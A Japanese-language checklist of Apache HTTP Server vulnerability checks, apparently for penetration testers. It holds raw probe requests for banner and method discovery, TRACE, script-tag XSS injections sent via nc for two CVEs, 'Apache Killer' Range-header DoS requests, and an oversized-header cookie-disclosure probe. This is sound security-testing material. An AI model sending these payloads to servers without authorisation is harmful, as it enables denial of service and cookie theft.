Apache HTTP Server チェック項目

バナー情報

HEAD / HTTP/1.0

使用可能なメソッド一覧

OPTIONS / HTTP/1.0

TRACEメソッドの有効/無効

TRACE / HTTP/1.0
TEST: TRACETEST

ExpectリクエストヘッダにおけるXSS (CVE-2006-3918)

Apache HTTP Server 1.3.34 およびそれ以前
Apache HTTP Server 2.0.55 およびそれ以前
Apache HTTP Server 2.2.0
エラーメッセージ内のscriptタグがエスケープされているかどうかで判別

# echo -en "GET / HTTP/1.0\nExpect: <script>alert("XSS");</script>\n\n" | nc www.example.co.jp 80

413エラーメッセージにおけるXSS (CVE-2007-6203)

Apache HTTP Server 2.0.62 およびそれ以前
Apache HTTP Server 2.2.7 およびそれ以前
エラーメッセージ内のscriptタグがエスケープされているかどうかで判別

# echo -en "<script>alert("XSS");</script> / HTTP/1.1\nContent-Length: 0\nContent-Length: 0\nHost: www.example.co.jp\n\n" | nc www.example.co.jp 80

Range Header DoS (CVE-2011-3192)

Apache HTTP Server 2.2.19 およびそれ以前
"Apache Killer"(CVE-2011-3192) Checker by yamagata21

GET / HTTP/1.0
Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10

GET / HTTP/1.0
Range: bytes=0-,1-

httpOnly Cookie Disclosure (CVE-2012-0053)

Apache HTTP Server 2.2.21 およびそれ以前
レスポンスの<pre>タグ内の文字数で判別

GET / HTTP/1.0
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|before2_2_21